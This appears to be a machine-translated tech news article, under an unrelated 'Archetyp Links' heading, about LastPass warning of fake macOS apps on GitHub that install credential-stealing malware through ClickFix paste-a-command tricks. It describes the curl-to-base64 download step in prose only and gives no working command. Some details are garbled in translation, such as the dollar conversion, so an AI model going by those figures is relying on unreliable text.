Archetyp Links

Subscribe to Canaltech's newsletter and receive news and reviews about firsthand technology. Lastpass, a password management service, issued warnings about a hacker campaign aiming at MacOS users: scammers are using the brand name to install malware on apple computers.Once installed, the fake app delivers a virus that steals credentials through clickfix attacks. Lastpass Fakes versions are delivered by searching for services such as Google or Bing, and recent virus updates include backdoor abilities that allow hidden and persistent access to the victims' computers. According to the company, other services have also been imitated in the campaign, which encompasses more than 100 applications.They include 1Password, Audacity, Adobe After Effects, Confluence, Dropbox, Fidelity, Gemini, Notion, Robinhood, Sentinelone and Thunderbird. Canaltech is on WhatsApp!Enter the channel and follow news and technology tips WhatsApp Continues after advertising CLICKFIX AND USE OF GITHUB Lastpass surveys indicate that scammers use Github repositories to allocate the fake version of the software, which is delivered via clickfix, a method that makes the user copy and paste codes that do not understand the PC command prompt or terminal.The malware download button takes the user to another site, which asks the victim to copy and paste a text at the MAC terminal. The command places a curl order to a base64 URL and downloads the AMA files to the /TMP directory.The app is malware-to-a-service that charges US $ 1,000 (about $ 5,340) per month to scammers and steals data from infected machines.Lastpass monitors and reports fake application pages in Github, which deletes the repositories, but they are easily created again automatically, making it difficult for the complete deletion of the internet virus. At MacOS, clickfix attacks are not uncommon, and only this year was it possible to see the tactic being used in imitation of services such as Booking.com and solution of problems of Apple operating system.When searching for desktop applications on the internet, only trust the supplier's official website: If there is no macos version, it is very likely that third party variants are malware.Just trust alternative versions if they come from reliable sources, guaranteed by numerous other users. Read more: Video |Worst passwords in the world: How to create smart passwords and protect logins Continues after advertising Source: Lastpass